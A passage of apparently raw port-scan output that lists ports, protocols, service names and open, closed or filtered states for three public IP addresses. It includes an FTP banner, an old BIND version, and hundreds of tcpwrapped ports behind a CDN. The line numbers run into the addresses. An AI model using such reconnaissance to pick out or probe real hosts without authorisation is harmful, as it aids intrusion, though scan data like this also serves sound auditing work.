7011111.90.145.39 139 udp netbios-ssn closed
7012111.90.145.39 161 tcp snmp closed
7013111.90.145.39 161 udp snmp unknown
7014111.90.145.39 162 tcp snmptrap closed
7015111.90.145.39 162 udp snmptrap closed
7016111.90.145.39 389 tcp ldap closed
7017111.90.145.39 389 udp ldap unknown
7018111.90.145.39 520 tcp efs closed
7019111.90.145.39 520 udp route closed
7020111.90.145.39 2049 tcp nfs closed
7021111.90.145.39 2049 udp nfs closed
7022143.95.110.248 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 150 allowed.\x0d\x0a220-Local time is now 05:55. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
7023143.95.110.248 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
7024143.95.110.248 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
7025143.95.110.248 67 tcp dhcps closed
7026143.95.110.248 67 udp dhcps unknown
7027143.95.110.248 68 tcp dhcpc closed
7028143.95.110.248 68 udp dhcpc unknown
7029143.95.110.248 69 tcp tftp closed
7030143.95.110.248 69 udp tftp unknown
7031143.95.110.248 88 tcp kerberos-sec closed
7032143.95.110.248 88 udp kerberos-sec unknown
7033143.95.110.248 123 tcp ntp closed
7034143.95.110.248 123 udp ntp unknown
7035143.95.110.248 137 tcp netbios-ns closed
7036143.95.110.248 137 udp netbios-ns unknown
7037143.95.110.248 138 tcp netbios-dgm closed
7038143.95.110.248 138 udp netbios-dgm closed
7039143.95.110.248 139 tcp netbios-ssn closed
7040143.95.110.248 139 udp netbios-ssn unknown
7041143.95.110.248 161 tcp snmp closed
7042143.95.110.248 161 udp snmp closed
7043143.95.110.248 162 tcp snmptrap closed
7044143.95.110.248 162 udp snmptrap unknown
7045143.95.110.248 389 tcp ldap closed
7046143.95.110.248 389 udp ldap closed
7047143.95.110.248 520 tcp efs closed
7048143.95.110.248 520 udp route unknown
7049143.95.110.248 2049 tcp nfs closed
7050143.95.110.248 2049 udp nfs unknown
7051149.126.72.220 25 tcp smtp closed
7052149.126.72.220 51 tcp tcpwrapped open
7053149.126.72.220 53 tcp domain open
7054149.126.72.220 53 udp domain open
7055149.126.72.220 65 tcp tcpwrapped open
7056149.126.72.220 66 tcp tcpwrapped open
7057149.126.72.220 67 tcp dhcps filtered
7058149.126.72.220 67 udp dhcps unknown
7059149.126.72.220 68 tcp dhcpc filtered
7060149.126.72.220 68 udp dhcpc unknown
7061149.126.72.220 69 tcp tftp filtered
7062149.126.72.220 69 udp tftp unknown
7063149.126.72.220 80 tcp tcpwrapped open
7064149.126.72.220 81 tcp tcpwrapped open
7065149.126.72.220 82 tcp tcpwrapped open
7066149.126.72.220 83 tcp tcpwrapped open
7067149.126.72.220 84 tcp tcpwrapped open
7068149.126.72.220 85 tcp tcpwrapped open
7069149.126.72.220 86 tcp tcpwrapped open
7070149.126.72.220 88 tcp http open Incapsula CDN httpd
7071149.126.72.220 88 udp kerberos-sec unknown
7072149.126.72.220 89 tcp tcpwrapped open
7073149.126.72.220 90 tcp tcpwrapped open
7074149.126.72.220 91 tcp tcpwrapped open
7075149.126.72.220 92 tcp tcpwrapped open
7076149.126.72.220 98 tcp tcpwrapped open
7077149.126.72.220 99 tcp tcpwrapped open
7078149.126.72.220 123 tcp ntp filtered
7079149.126.72.220 123 udp ntp unknown
7080149.126.72.220 137 tcp netbios-ns filtered
7081149.126.72.220 137 udp netbios-ns filtered
7082149.126.72.220 138 tcp netbios-dgm filtered
7083149.126.72.220 138 udp netbios-dgm filtered
7084149.126.72.220 139 tcp netbios-ssn closed
7085149.126.72.220 139 udp netbios-ssn unknown
7086149.126.72.220 160 tcp sgmp-traps closed
7087149.126.72.220 161 tcp snmp filtered
7088149.126.72.220 161 udp snmp unknown
7089149.126.72.220 162 tcp snmptrap filtered
7090149.126.72.220 162 udp snmptrap unknown
7091149.126.72.220 189 tcp tcpwrapped open
7092149.126.72.220 190 tcp tcpwrapped open
7093149.126.72.220 192 tcp tcpwrapped open
7094149.126.72.220 243 tcp tcpwrapped open
7095149.126.72.220 285 tcp tcpwrapped open
7096149.126.72.220 314 tcp tcpwrapped open
7097149.126.72.220 343 tcp tcpwrapped open
7098149.126.72.220 347 tcp tcpwrapped open
7099149.126.72.220 385 tcp tcpwrapped open
7100149.126.72.220 389 tcp ssl/http open Incapsula CDN httpd
7101149.126.72.220 389 udp ldap unknown
7102149.126.72.220 400 tcp tcpwrapped open
7103149.126.72.220 440 tcp tcpwrapped open
7104149.126.72.220 441 tcp tcpwrapped open
7105149.126.72.220 442 tcp tcpwrapped open
7106149.126.72.220 443 tcp ssl/tcpwrapped open
7107149.126.72.220 444 tcp tcpwrapped open
7108149.126.72.220 445 tcp microsoft-ds closed
7109149.126.72.220 446 tcp tcpwrapped open
7110149.126.72.220 447 tcp tcpwrapped open
7111149.126.72.220 448 tcp tcpwrapped open
7112149.126.72.220 449 tcp tcpwrapped open
7113149.126.72.220 452 tcp tcpwrapped open
7114149.126.72.220 461 tcp tcpwrapped open
7115149.126.72.220 462 tcp tcpwrapped open
7116149.126.72.220 480 tcp tcpwrapped open
7117149.126.72.220 485 tcp tcpwrapped open
7118149.126.72.220 487 tcp tcpwrapped open
7119149.126.72.220 488 tcp tcpwrapped open
7120149.126.72.220 491 tcp tcpwrapped open
7121149.126.72.220 520 tcp efs filtered
7122149.126.72.220 520 udp route unknown
7123149.126.72.220 555 tcp tcpwrapped open
7124149.126.72.220 556 tcp tcpwrapped open
7125149.126.72.220 587 tcp tcpwrapped open
7126149.126.72.220 631 tcp tcpwrapped open
7127149.126.72.220 632 tcp tcpwrapped open
7128149.126.72.220 636 tcp tcpwrapped open
7129149.126.72.220 743 tcp tcpwrapped open
7130149.126.72.220 772 tcp tcpwrapped open
7131149.126.72.220 777 tcp tcpwrapped open
7132149.126.72.220 782 tcp tcpwrapped open
7133149.126.72.220 785 tcp tcpwrapped open
7134149.126.72.220 800 tcp tcpwrapped open
7135149.126.72.220 801 tcp tcpwrapped open
7136149.126.72.220 805 tcp tcpwrapped open
7137149.126.72.220 806 tcp tcpwrapped open
7138149.126.72.220 809 tcp tcpwrapped open
7139149.126.72.220 843 tcp tcpwrapped open
7140149.126.72.220 853 tcp tcpwrapped open
7141149.126.72.220 885 tcp tcpwrapped open
7142149.126.72.220 886 tcp tcpwrapped open
7143149.126.72.220 887 tcp tcpwrapped open
7144149.126.72.220 888 tcp tcpwrapped open
7145149.126.72.220 943 tcp tcpwrapped open
7146149.126.72.220 947 tcp tcpwrapped open
7147149.126.72.220 953 tcp tcpwrapped open
7148149.126.72.220 990 tcp tcpwrapped open
7149149.126.72.220 995 tcp tcpwrapped open
7150149.126.72.220 998 tcp tcpwrapped open
7151149.126.72.220 999 tcp tcpwrapped open
7152149.126.72.220 1000 tcp tcpwrapped open
7153149.126.72.220 1002 tcp tcpwrapped open
7154149.126.72.220 1024 tcp tcpwrapped open
7155149.126.72.220 1025 tcp tcpwrapped open
7156149.126.72.220 1028 tcp tcpwrapped open
7157149.126.72.220 1080 tcp tcpwrapped open
7158149.126.72.220 1103 tcp tcpwrapped open
7159149.126.72.220 1111 tcp tcpwrapped open
7160149.126.72.220 1180 tcp tcpwrapped open
7161149.126.72.220 1181 tcp tcpwrapped open
7162149.126.72.220 1207 tcp tcpwrapped open
7163149.126.72.220 1234 tcp tcpwrapped open
7164149.126.72.220 1250 tcp tcpwrapped open
7165149.126.72.220 1283 tcp tcpwrapped open
7166149.126.72.220 1291 tcp tcpwrapped open
7167149.126.72.220 1292 tcp tcpwrapped open
7168149.126.72.220 1293 tcp tcpwrapped open
7169149.126.72.220 1337 tcp tcpwrapped open
7170149.126.72.220 1344 tcp tcpwrapped open
7171149.126.72.220 1355 tcp tcpwrapped open
7172149.126.72.220 1364 tcp tcpwrapped open
7173149.126.72.220 1366 tcp tcpwrapped open
7174149.126.72.220 1377 tcp tcpwrapped open
7175149.126.72.220 1387 tcp tcpwrapped open
7176149.126.72.220 1388 tcp tcpwrapped open
7177149.126.72.220 1433 tcp tcpwrapped open
7178149.126.72.220 1443 tcp tcpwrapped open
7179149.126.72.220 1447 tcp tcpwrapped open
7180149.126.72.220 1450 tcp tcpwrapped open
7181149.126.72.220 1451 tcp tcpwrapped open
7182149.126.72.220 1452 tcp tcpwrapped open
7183149.126.72.220 1453 tcp tcpwrapped open
7184149.126.72.220 1454 tcp tcpwrapped open
7185149.126.72.220 1455 tcp tcpwrapped open
7186149.126.72.220 1456 tcp tcpwrapped open
7187149.126.72.220 1457 tcp tcpwrapped open
7188149.126.72.220 1458 tcp tcpwrapped open
7189149.126.72.220 1459 tcp tcpwrapped open
7190149.126.72.220 1460 tcp tcpwrapped open
7191149.126.72.220 1494 tcp tcpwrapped open
7192149.126.72.220 1935 tcp tcpwrapped open
7193149.126.72.220 1950 tcp tcpwrapped open
7194149.126.72.220 1951 tcp tcpwrapped open
7195149.126.72.220 1952 tcp tcpwrapped open
7196149.126.72.220 1953 tcp tcpwrapped open
7197149.126.72.220 1954 tcp tcpwrapped open
7198149.126.72.220 1955 tcp tcpwrapped open
7199149.126.72.220 1956 tcp tcpwrapped open
7200149.126.72.220 1957 tcp tcpwrapped open
7201149.126.72.220 1958 tcp tcpwrapped open
7202149.126.72.220 1959 tcp tcpwrapped open
7203149.126.72.220 1960 tcp tcpwrapped open
7204149.126.72.220 1964 tcp tcpwrapped open
7205149.126.72.220 1965 tcp tcpwrapped open
7206149.126.72.220 1966 tcp tcpwrapped open
7207149.126.72.220 1967 tcp tcpwrapped open
7208149.126.72.220 1968 tcp tcpwrapped open
7209149.126.72.220 1969 tcp tcpwrapped open
7210149.126.72.220 1970 tcp tcpwrapped open
7211149.126.72.220 1971 tcp tcpwrapped open
7212149.126.72.220 1972 tcp tcpwrapped open
7213149.126.72.220 1973 tcp tcpwrapped open
7214149.126.72.220 1974 tcp tcpwrapped open
7215149.126.72.220 1975 tcp tcpwrapped open
7216149.126.72.220 1976 tcp tcpwrapped open
7217149.126.72.220 1977 tcp tcpwrapped open
7218149.126.72.220 1978 tcp tcpwrapped open
7219149.126.72.220 1979 tcp tcpwrapped open
7220149.126.72.220 1980 tcp tcpwrapped open
7221149.126.72.220 1981 tcp tcpwrapped open
7222149.126.72.220 1982 tcp tcpwrapped open
7223149.126.72.220 1983 tcp tcpwrapped open
7224149.126.72.220 1984 tcp tcpwrapped open
7225149.126.72.220 1985 tcp tcpwrapped open
7226149.126.72.220 1986 tcp tcpwrapped open
7227149.126.72.220 1987 tcp tcpwrapped open
7228149.126.72.220 1988 tcp tcpwrapped open
7229149.126.72.220 1989 tcp tcpwrapped open
7230149.126.72.220 2000 tcp tcpwrapped open
7231149.126.72.220 2001 tcp tcpwrapped open
7232149.126.72.220 2006 tcp tcpwrapped open
7233149.126.72.220 2012 tcp tcpwrapped open
7234149.126.72.220 2020 tcp tcpwrapped open
7235149.126.72.220 2048 tcp tcpwrapped open
7236149.126.72.220 2049 tcp http open Incapsula CDN httpd
7237149.126.72.220 2049 udp nfs unknown
7238149.126.72.220 2050 tcp tcpwrapped open
7239149.126.72.220 2051 tcp tcpwrapped open
7240149.126.72.220 2052 tcp tcpwrapped open
7241149.126.72.220 2053 tcp tcpwrapped open
7242149.126.72.220 2054 tcp tcpwrapped open
7243149.126.72.220 2055 tcp tcpwrapped open
7244149.126.72.220 2056 tcp tcpwrapped open
7245149.126.72.220 2057 tcp tcpwrapped open
7246149.126.72.220 2058 tcp tcpwrapped open
7247149.126.72.220 2059 tcp tcpwrapped open
7248149.126.72.220 2060 tcp tcpwrapped open
7249149.126.72.220 2061 tcp tcpwrapped open
7250149.126.72.220 2062 tcp tcpwrapped open
7251149.126.72.220 2063 tcp tcpwrapped open
7252149.126.72.220 2064 tcp tcpwrapped open
7253149.126.72.220 2065 tcp tcpwrapped open
7254149.126.72.220 2066 tcp tcpwrapped open
7255149.126.72.220 2067 tcp tcpwrapped open
7256149.126.72.220 2068 tcp tcpwrapped open
7257149.126.72.220 2069 tcp tcpwrapped open
7258149.126.72.220 2070 tcp tcpwrapped open
7259149.126.72.220 2072 tcp tcpwrapped open
7260149.126.72.220 2082 tcp tcpwrapped open
7261149.126.72.220 2083 tcp tcpwrapped open
7262149.126.72.220 2087 tcp tcpwrapped open
7263149.126.72.220 2096 tcp tcpwrapped open
7264149.126.72.220 2100 tcp tcpwrapped open
7265149.126.72.220 2108 tcp tcpwrapped open
7266149.126.72.220 2200 tcp tcpwrapped open
7267149.126.72.220 2209 tcp tcpwrapped open
7268149.126.72.220 2222 tcp tcpwrapped open
7269149.126.72.220 2226 tcp tcpwrapped open
7270149.126.72.220 2248 tcp tcpwrapped open
7271149.126.72.220 2344 tcp tcpwrapped open
7272149.126.72.220 2345 tcp tcpwrapped open
7273149.126.72.220 2353 tcp tcpwrapped open
7274149.126.72.220 2363 tcp tcpwrapped open
7275149.126.72.220 2423 tcp tcpwrapped open
7276149.126.72.220 2433 tcp tcpwrapped open
7277149.126.72.220 2435 tcp tcpwrapped open
7278149.126.72.220 2443 tcp tcpwrapped open
7279149.126.72.220 2453 tcp tcpwrapped open
7280149.126.72.220 2480 tcp tcpwrapped open
7281149.126.72.220 2548 tcp tcpwrapped open
7282149.126.72.220 2549 tcp tcpwrapped open
7283149.126.72.220 2550 tcp tcpwrapped open
7284149.126.72.220 2551 tcp tcpwrapped open
7285149.126.72.220 2552 tcp tcpwrapped open
7286149.126.72.220 2553 tcp tcpwrapped open
7287149.126.72.220 2554 tcp tcpwrapped open
7288149.126.72.220 2555 tcp tcpwrapped open
7289149.126.72.220 2556 tcp tcpwrapped open
7290149.126.72.220 2557 tcp tcpwrapped open
7291149.126.72.220 2558 tcp tcpwrapped open
7292149.126.72.220 2559 tcp tcpwrapped open
7293149.126.72.220 2560 tcp tcpwrapped open
7294149.126.72.220 2561 tcp tcpwrapped open
7295149.126.72.220 2562 tcp tcpwrapped open
7296149.126.72.220 2563 tcp tcpwrapped open
7297149.126.72.220 2566 tcp tcpwrapped open
7298149.126.72.220 2567 tcp tcpwrapped open
7299149.126.72.220 2568 tcp tcpwrapped open
7300149.126.72.220 2569 tcp tcpwrapped open
7301149.126.72.220 2570 tcp tcpwrapped open
7302149.126.72.220 2572 tcp tcpwrapped open
7303149.126.72.220 2598 tcp tcpwrapped open
7304149.126.72.220 2599 tcp tcpwrapped open
7305149.126.72.220 2850 tcp tcpwrapped open
7306149.126.72.220 2985 tcp tcpwrapped open
7307149.126.72.220 2995 tcp tcpwrapped open
7308149.126.72.220 3000 tcp tcpwrapped open
7309149.126.72.220 3001 tcp tcpwrapped open
7310149.126.72.220 3002 tcp tcpwrapped open
7311149.126.72.220 3003 tcp tcpwrapped open
7312149.126.72.220 3004 tcp tcpwrapped open
7313149.126.72.220 3005 tcp tcpwrapped open
7314149.126.72.220 3006 tcp tcpwrapped open
7315149.126.72.220 3007 tcp tcpwrapped open
7316149.126.72.220 3008 tcp tcpwrapped open
7317149.126.72.220 3009 tcp tcpwrapped open
7318149.126.72.220 3010 tcp tcpwrapped open
7319149.126.72.220 3011 tcp tcpwrapped open
7320149.126.72.220 3012 tcp tcpwrapped open
7321149.126.72.220 3013 tcp tcpwrapped open
7322149.126.72.220 3014 tcp tcpwrapped open
7323149.126.72.220 3015 tcp tcpwrapped open
7324149.126.72.220 3016 tcp tcpwrapped open
7325149.126.72.220 3017 tcp tcpwrapped open
7326149.126.72.220 3018 tcp tcpwrapped open
7327149.126.72.220 3019 tcp tcpwrapped open
7328149.126.72.220 3020 tcp tcpwrapped open
7329149.126.72.220 3021 tcp tcpwrapped open
7330149.126.72.220 3022 tcp tcpwrapped open
7331149.126.72.220 3030 tcp tcpwrapped open
7332149.126.72.220 3047 tcp tcpwrapped open
7333149.126.72.220 3048 tcp tcpwrapped open
7334149.126.72.220 3049 tcp tcpwrapped open
7335149.126.72.220 3050 tcp tcpwrapped open
7336149.126.72.220 3051 tcp tcpwrapped open
7337149.126.72.220 3052 tcp tcpwrapped open
7338149.126.72.220 3053 tcp tcpwrapped open
7339149.126.72.220 3054 tcp tcpwrapped open
7340149.126.72.220 3055 tcp tcpwrapped open
7341149.126.72.220 3056 tcp tcpwrapped open
7342149.126.72.220 3057 tcp tcpwrapped open
7343149.126.72.220 3058 tcp tcpwrapped open
7344149.126.72.220 3059 tcp tcpwrapped open
7345149.126.72.220 3060 tcp tcpwrapped open
7346149.126.72.220 3061 tcp tcpwrapped open
7347149.126.72.220 3062 tcp tcpwrapped open
7348149.126.72.220 3063 tcp tcpwrapped open
7349149.126.72.220 3064 tcp tcpwrapped open
7350149.126.72.220 3065 tcp tcpwrapped open
7351149.126.72.220 3066 tcp tcpwrapped open
7352149.126.72.220 3067 tcp tcpwrapped open
7353149.126.72.220 3068 tcp tcpwrapped open
7354149.126.72.220 3069 tcp tcpwrapped open
7355149.126.72.220 3070 tcp tcpwrapped open
7356149.126.72.220 3071 tcp tcpwrapped open
7357149.126.72.220 3072 tcp tcpwrapped open
7358149.126.72.220 3073 tcp tcpwrapped open
7359149.126.72.220 3074 tcp tcpwrapped open
7360149.126.72.220 3075 tcp tcpwrapped open
7361149.126.72.220 3076 tcp tcpwrapped open
7362149.126.72.220 3077 tcp tcpwrapped open
7363149.126.72.220 3078 tcp tcpwrapped open
7364149.126.72.220 3079 tcp tcpwrapped open
7365149.126.72.220 3080 tcp tcpwrapped open
7366149.126.72.220 3081 tcp tcpwrapped open
7367149.126.72.220 3082 tcp tcpwrapped open
7368149.126.72.220 3083 tcp tcpwrapped open
7369149.126.72.220 3084 tcp tcpwrapped open
7370149.126.72.220 3085 tcp tcpwrapped open
7371149.126.72.220 3086 tcp tcpwrapped open
7372149.126.72.220 3087 tcp tcpwrapped open
7373149.126.72.220 3088 tcp tcpwrapped open
7374149.126.72.220 3089 tcp tcpwrapped open
7375149.126.72.220 3090 tcp tcpwrapped open
7376149.126.72.220 3091 tcp tcpwrapped open
7377149.126.72.220 3092 tcp tcpwrapped open
7378149.126.72.220 3093 tcp tcpwrapped open
7379149.126.72.220 3094 tcp tcpwrapped open
7380149.126.72.220 3095 tcp tcpwrapped open
7381149.126.72.220 3096 tcp tcpwrapped open
7382149.126.72.220 3097 tcp tcpwrapped open
7383149.126.72.220 3098 tcp tcpwrapped open
7384149.126.72.220 3099 tcp tcpwrapped open
7385149.126.72.220 3100 tcp tcpwrapped open
7386149.126.72.220 3101 tcp tcpwrapped open
7387149.126.72.220 3102 tcp tcpwrapped open
7388149.126.72.220 3103 tcp tcpwrapped open
7389149.126.72.220 3104 tcp tcpwrapped open
7390149.126.72.220 3105 tcp tcpwrapped open
7391149.126.72.220 3106 tcp tcpwrapped open
7392149.126.72.220 3107 tcp tcpwrapped open
7393149.126.72.220 3108 tcp tcpwrapped open
7394149.126.72.220 3109 tcp tcpwrapped open
7395149.126.72.220 3110 tcp tcpwrapped open
7396149.126.72.220 3111 tcp tcpwrapped open
7397149.126.72.220 3112 tcp tcpwrapped open
7398149.126.72.220 3113 tcp tcpwrapped open
7399149.126.72.220 3114 tcp tcpwrapped open
7400149.126.72.220 3115 tcp tcpwrapped open
7401149.126.72.220 3116 tcp tcpwrapped open
7402149.126.72.220 3117 tcp tcpwrapped open
7403149.126.72.220 3118 tcp tcpwrapped open
7404149.126.72.220 3119 tcp tcpwrapped open
7405149.126.72.220 3120 tcp tcpwrapped open
7406149.126.72.220 3121 tcp tcpwrapped open
7407149.126.72.220 3150 tcp tcpwrapped open
7408149.126.72.220 3155 tcp tcpwrapped open
7409149.126.72.220 3160 tcp tcpwrapped open
7410149.126.72.220 3165 tcp tcpwrapped open
7411149.126.72.220 3270 tcp tcpwrapped open
7412149.126.72.220 3299 tcp tcpwrapped open
7413149.126.72.220 3306 tcp tcpwrapped open
7414149.126.72.220 3333 tcp tcpwrapped open
7415149.126.72.220 3389 tcp tcpwrapped open
7416149.126.72.220 3391 tcp tcpwrapped open
7417149.126.72.220 3400 tcp tcpwrapped open
7418149.126.72.220 3401 tcp tcpwrapped open
7419149.126.72.220 3402 tcp tcpwrapped open
7420149.126.72.220 3403 tcp tcpwrapped open
7421149.126.72.220 3404 tcp tcpwrapped open
7422149.126.72.220 3405 tcp tcpwrapped open
7423149.126.72.220 3406 tcp tcpwrapped open
7424149.126.72.220 3407 tcp tcpwrapped open
7425149.126.72.220 3408 tcp tcpwrapped open
7426149.126.72.220 3409 tcp tcpwrapped open
7427149.126.72.220 3410 tcp tcpwrapped open
7428149.126.72.220 3412 tcp tcpwrapped open
7429149.126.72.220 3443 tcp tcpwrapped open
7430149.126.72.220 3500 tcp tcpwrapped open
7431149.126.72.220 3510 tcp tcpwrapped open
7432149.126.72.220 3521 tcp tcpwrapped open
7433149.126.72.220 3522 tcp tcpwrapped open
7434149.126.72.220 3523 tcp tcpwrapped open
7435149.126.72.220 3524 tcp tcpwrapped open
7436149.126.72.220 3530 tcp tcpwrapped open
7437149.126.72.220 3531 tcp tcpwrapped open
7438149.126.72.220 3540 tcp tcpwrapped open
7439149.126.72.220 3548 tcp tcpwrapped open
7440149.126.72.220 3549 tcp tcpwrapped open
7441149.126.72.220 3550 tcp tcpwrapped open
7442149.126.72.220 3551 tcp tcpwrapped open
7443149.126.72.220 3552 tcp tcpwrapped open
7444149.126.72.220 3553 tcp tcpwrapped open
7445149.126.72.220 3554 tcp tcpwrapped open
7446149.126.72.220 3555 tcp tcpwrapped open
7447149.126.72.220 3556 tcp tcpwrapped open
7448149.126.72.220 3557 tcp tcpwrapped open
7449149.126.72.220 3558 tcp tcpwrapped open
7450149.126.72.220 3559 tcp tcpwrapped open
7451149.126.72.220 3560 tcp tcpwrapped open
7452149.126.72.220 3561 tcp tcpwrapped open
7453149.126.72.220 3562 tcp tcpwrapped open
7454149.126.72.220 3563 tcp tcpwrapped open
7455149.126.72.220 3566 tcp tcpwrapped open
7456149.126.72.220 3567 tcp tcpwrapped open
7457149.126.72.220 3568 tcp tcpwrapped open
7458149.126.72.220 3569 tcp tcpwrapped open
7459149.126.72.220 3570 tcp tcpwrapped open
7460149.126.72.220 3572 tcp tcpwrapped open
7461149.126.72.220 3580 tcp tcpwrapped open
7462149.126.72.220 3590 tcp tcpwrapped open
7463149.126.72.220 3790 tcp tcpwrapped open
7464149.126.72.220 3791 tcp tcpwrapped open
7465149.126.72.220 3792 tcp tcpwrapped open
7466149.126.72.220 3793 tcp tcpwrapped open
7467149.126.72.220 3794 tcp tcpwrapped open
7468149.126.72.220 3838 tcp tcpwrapped open
7469149.126.72.220 3841 tcp tcpwrapped open
7470149.126.72.220 3842 tcp tcpwrapped open
7471149.126.72.220 3950 tcp tcpwrapped open
7472149.126.72.220 3951 tcp tcpwrapped open
7473149.126.72.220 3952 tcp tcpwrapped open
7474149.126.72.220 3953 tcp tcpwrapped open
7475149.126.72.220 3954 tcp adrep open
7476149.126.72.220 4000 tcp tcpwrapped open
7477149.126.72.220 4001 tcp newoak open
7478149.126.72.220 4002 tcp mlchat-proxy open
7479149.126.72.220 4021 tcp nexus-portal open
7480149.126.72.220 4022 tcp dnox open
7481149.126.72.220 4023 tcp esnm-zoning open
7482149.126.72.220 4043 tcp nirp open
7483149.126.72.220 4072 tcp zieto-sock open
7484149.126.72.220 4080 tcp lorica-in open
7485149.126.72.220 4085 tcp ezmessagesrv open
7486149.126.72.220 4120 tcp minirem open
7487149.126.72.220 4147 tcp vrxpservman open
7488149.126.72.220 4148 tcp hhb-handheld open
7489149.126.72.220 4150 tcp poweralert-nsa open
7490149.126.72.220 4155 tcp bzr open
7491149.126.72.220 4160 tcp jini-discovery open
7492149.126.72.220 4165 tcp altcp open
7493149.126.72.220 4172 tcp pcoip open
7494149.126.72.220 4243 tcp vrml-multi-use open
7495149.126.72.220 4244 tcp vrml-multi-use open
7496149.126.72.220 4250 tcp vrml-multi-use open
7497149.126.72.220 4300 tcp corelccam open
7498149.126.72.220 4333 tcp msql open
7499149.126.72.220 4343 tcp unicall open
7500149.126.72.220 4344 tcp vinainstall open
7501149.126.72.220 4400 tcp ds-srv open
7502149.126.72.220 4401 tcp tcpwrapped open
7503149.126.72.220 4402 tcp tcpwrapped open
7504149.126.72.220 4430 tcp tcpwrapped open
7505149.126.72.220 4431 tcp tcpwrapped open
7506149.126.72.220 4432 tcp tcpwrapped open
7507149.126.72.220 4434 tcp tcpwrapped open
7508149.126.72.220 4435 tcp tcpwrapped open
7509149.126.72.220 4436 tcp tcpwrapped open
7510149.126.72.220 4437 tcp tcpwrapped open
7511149.126.72.220 4439 tcp tcpwrapped open
7512149.126.72.220 4440 tcp tcpwrapped open
7513149.126.72.220 4443 tcp tcpwrapped open
7514149.126.72.220 4444 tcp tcpwrapped open
7515149.126.72.220 4445 tcp tcpwrapped open
7516149.126.72.220 4451 tcp tcpwrapped open
7517149.126.72.220 4455 tcp tcpwrapped open
7518149.126.72.220 4457 tcp tcpwrapped open
7519149.126.72.220 4459 tcp tcpwrapped open
7520149.126.72.220 4461 tcp tcpwrapped open
7521149.126.72.220 4463 tcp tcpwrapped open
7522149.126.72.220 4477 tcp tcpwrapped open
7523149.126.72.220 4482 tcp tcpwrapped open
7524149.126.72.220 4500 tcp tcpwrapped open
7525149.126.72.220 4502 tcp tcpwrapped open
7526149.126.72.220 4505 tcp tcpwrapped open
7527149.126.72.220 4572 tcp tcpwrapped open
7528149.126.72.220 4602 tcp tcpwrapped open
7529149.126.72.220 4620 tcp tcpwrapped open
7530149.126.72.220 4643 tcp tcpwrapped open
7531149.126.72.220 4848 tcp tcpwrapped open
7532149.126.72.220 4933 tcp tcpwrapped open
7533149.126.72.220 4993 tcp tcpwrapped open
7534149.126.72.220 5000 tcp tcpwrapped open
7535149.126.72.220 5001 tcp tcpwrapped open
7536149.126.72.220 5002 tcp tcpwrapped open
7537149.126.72.220 5003 tcp tcpwrapped open
7538149.126.72.220 5004 tcp tcpwrapped open
7539149.126.72.220 5005 tcp tcpwrapped open
7540149.126.72.220 5006 tcp tcpwrapped open
7541149.126.72.220 5007 tcp tcpwrapped open
7542149.126.72.220 5008 tcp tcpwrapped open
7543149.126.72.220 5009 tcp tcpwrapped open
7544149.126.72.220 5010 tcp tcpwrapped open
7545149.126.72.220 5011 tcp tcpwrapped open
7546149.126.72.220 5022 tcp tcpwrapped open
7547149.126.72.220 5050 tcp tcpwrapped open
7548149.126.72.220 5053 tcp tcpwrapped open
7549149.126.72.220 5060 tcp tcpwrapped open
7550149.126.72.220 5061 tcp tcpwrapped open
7551149.126.72.220 5080 tcp tcpwrapped open
7552149.126.72.220 5083 tcp tcpwrapped open
7553149.126.72.220 5089 tcp tcpwrapped open
7554149.126.72.220 5090 tcp tcpwrapped open
7555149.126.72.220 5100 tcp tcpwrapped open
7556149.126.72.220 5105 tcp tcpwrapped open
7557149.126.72.220 5119 tcp tcpwrapped open
7558149.126.72.220 5120 tcp tcpwrapped open
7559149.126.72.220 5130 tcp tcpwrapped open
7560149.126.72.220 5140 tcp tcpwrapped open
7561149.126.72.220 5150 tcp tcpwrapped open
7562149.126.72.220 5160 tcp tcpwrapped open
7563149.126.72.220 5180 tcp tcpwrapped open
7564149.126.72.220 5201 tcp tcpwrapped open
7565149.126.72.220 5222 tcp tcpwrapped open
7566149.126.72.220 5223 tcp tcpwrapped open
7567149.126.72.220 5224 tcp tcpwrapped open
7568149.126.72.220 5225 tcp tcpwrapped open
7569149.126.72.220 5226 tcp tcpwrapped open
7570149.126.72.220 5227 tcp tcpwrapped open
7571149.126.72.220 5228 tcp tcpwrapped open
7572149.126.72.220 5229 tcp tcpwrapped open
7573149.126.72.220 5230 tcp tcpwrapped open
7574149.126.72.220 5231 tcp tcpwrapped open
7575149.126.72.220 5232 tcp tcpwrapped open
7576149.126.72.220 5233 tcp tcpwrapped open
7577149.126.72.220 5234 tcp tcpwrapped open
7578149.126.72.220 5235 tcp tcpwrapped open
7579149.126.72.220 5236 tcp tcpwrapped open
7580149.126.72.220 5237 tcp tcpwrapped open
7581149.126.72.220 5238 tcp tcpwrapped open
7582149.126.72.220 5239 tcp tcpwrapped open
7583149.126.72.220 5240 tcp tcpwrapped open
7584149.126.72.220 5241 tcp tcpwrapped open
7585149.126.72.220 5242 tcp tcpwrapped open
7586149.126.72.220 5243 tcp tcpwrapped open
7587149.126.72.220 5244 tcp tcpwrapped open
7588149.126.72.220 5245 tcp tcpwrapped open
7589149.126.72.220 5246 tcp tcpwrapped open
7590149.126.72.220 5247 tcp tcpwrapped open
7591149.126.72.220 5248 tcp tcpwrapped open
7592149.126.72.220 5249 tcp tcpwrapped open
7593149.126.72.220 5250 tcp tcpwrapped open
7594149.126.72.220 5251 tcp tcpwrapped open
7595149.126.72.220 5252 tcp tcpwrapped open
7596149.126.72.220 5253 tcp tcpwrapped open
7597149.126.72.220 5254 tcp tcpwrapped open
7598149.126.72.220 5255 tcp tcpwrapped open
7599149.126.72.220 5256 tcp tcpwrapped open
7600149.126.72.220 5257 tcp tcpwrapped open
7601149.126.72.220 5258 tcp tcpwrapped open
7602149.126.72.220 5259 tcp tcpwrapped open
7603149.126.72.220 5260 tcp tcpwrapped open
7604149.126.72.220 5261 tcp tcpwrapped open
7605149.126.72.220 5262 tcp tcpwrapped open
7606149.126.72.220 5263 tcp tcpwrapped open
7607149.126.72.220 5264 tcp tcpwrapped open
7608149.126.72.220 5265 tcp tcpwrapped open
7609149.126.72.220 5266 tcp tcpwrapped open
7610149.126.72.220 5267 tcp tcpwrapped open
7611149.126.72.220 5268 tcp tcpwrapped open
7612149.126.72.220 5269 tcp tcpwrapped open
7613149.126.72.220 5270 tcp tcpwrapped open
